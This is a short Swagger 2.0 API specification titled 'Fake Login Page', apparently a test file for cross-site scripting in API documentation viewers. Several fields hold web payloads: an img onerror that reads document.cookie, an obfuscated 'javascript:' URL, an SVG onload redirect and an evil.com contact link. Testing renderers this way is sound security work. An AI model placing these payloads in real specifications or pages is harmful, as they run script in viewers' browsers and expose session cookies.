swagger: '2.0'
info:
  version: 1.0.0
  title: Fake Login Page
  description: #"><img src=/ onerror=alert(document.cookie)>
  termsOfService: java%0d%0ascript%0d%0a:alert(0)
  <code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
</svg>
</code>
  contact: 
    name: "API Support"
    url: "https://evil.com/"
    email: "bilalabbasuk@gmail.com"



  
